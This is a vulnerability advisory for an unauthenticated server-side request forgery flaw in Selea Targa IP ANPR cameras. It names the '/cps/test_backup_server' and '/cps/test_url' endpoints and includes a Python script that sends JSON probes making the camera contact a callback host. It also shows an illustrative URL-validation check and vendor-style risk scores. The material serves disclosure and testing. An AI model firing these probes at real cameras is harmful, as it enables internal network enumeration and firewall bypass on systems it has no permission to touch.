Selea Targa IP OCR-ANPR Camera Server-Side Request Forgery Vulnerability

Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in multiple models of Selea Targa IP OCR-ANPR cameras. This vulnerability arises because the application does not properly validate user-supplied input in JSON POST parameters, such as 'ipnotify_address' and 'url'. These parameters are utilized by internal mechanisms to fetch images and perform DNS lookups. As a result, remote unauthenticated attackers can manipulate the system into making arbitrary HTTP requests to internal or external servers, potentially bypassing firewall restrictions or allowing internal service enumeration.

Impact

Exploitation of this vulnerability could lead to unauthorized HTTP requests being made to internal or external systems, potentially bypassing firewall controls and allowing enumeration of internal services.

Reproduction

The vulnerability can be reproduced by sending a JSON POST request to the '/cps/test_backup_server' endpoint with the 'ipnotify_address' parameter set to a URL on a host the tester controls; no authentication is required. The response indicates whether the request was sent, and the inbound connection on the tester's listener confirms that the camera issued it. Alternatively, the '/cps/test_url' endpoint can be used to achieve the same effect by specifying the URL in the 'url' parameter.
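The following Python script is an added example for the reproduction steps above; it is not code from the advisory or from Selea. It builds the two JSON POST probes exactly as the advisory names them (endpoint and parameter), sends one to a camera base URL and callback URL that are placeholders the tester supplies, and, as a contrast, shows the kind of outbound-URL check that the advisory says the firmware lacks. The JSON content type, the placeholder URLs, and the check function are assumptions; the check is an illustration, not the vendor's fix.

```python
"""Selea Targa IP OCR-ANPR SSRF: probe builder/sender plus an illustrative
server-side URL check. Added example, not vendor code. Assumes the camera
accepts a JSON body on the two endpoints named in the advisory; the
callback and camera URLs below are placeholders."""
import ipaddress
import json
import socket
import urllib.request
from urllib.parse import urlparse

# Endpoint -> JSON parameter, as listed in the advisory.
PROBE_PARAMS = {
    "/cps/test_backup_server": "ipnotify_address",
    "/cps/test_url": "url",
}


def build_probe(endpoint, callback_url):
    """Return (path, json_body_bytes) for one SSRF probe."""
    param = PROBE_PARAMS[endpoint]          # KeyError for unknown endpoints
    body = json.dumps({param: callback_url}).encode()
    return endpoint, body


def send_probe(base_url, endpoint, callback_url, timeout=10):
    """POST the probe to the camera without credentials; returns (status, text).
    The reliable confirmation of SSRF is the inbound hit on the listener
    behind callback_url, not the status code returned here."""
    path, body = build_probe(endpoint, callback_url)
    req = urllib.request.Request(
        base_url.rstrip("/") + path, data=body, method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


def _default_resolve(host):
    """Resolve a hostname to all of its addresses (hypothetical helper)."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def check_outbound_url(url, resolve=_default_resolve):
    """Illustrative check a patched firmware could apply before fetching a
    user-supplied URL. Returns (ok, reason). Rejects non-HTTP schemes,
    embedded credentials, and hostnames resolving to loopback, private,
    link-local or other special addresses. A camera that legitimately
    notifies a LAN server cannot rely on this alone: requiring authentication
    on the test endpoints is the primary fix, and DNS rebinding means the
    address must be re-checked at connect time, not only here."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    try:
        addrs = resolve(parts.hostname)
    except OSError as exc:                  # socket.gaierror is an OSError
        return False, f"DNS failure: {exc}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False, f"{parts.hostname} resolves to disallowed {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Placeholder values; replace with a lab camera and a listener you control.
    camera = "http://192.0.2.10"
    callback = "http://listener.example:8000/cb"
    for endpoint in PROBE_PARAMS:
        path, body = build_probe(endpoint, callback)
        print(f"POST {camera}{path}  {body.decode()}")
    # send_probe(camera, "/cps/test_backup_server", callback)
```

Run the probe against a lab unit only, with an HTTP listener on the callback host; the listener's access log is the evidence. The resolver parameter exists so the check can be exercised offline and so a fixed firmware could pin the resolved address it validated and connect to that address rather than resolving again.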

Added: Sep 1, 2025, 7:22 PM
Updated: Sep 1, 2025, 7:22 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 7.5
exploitability: 8.7
remediation: 0.0
relevance: 0.2
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.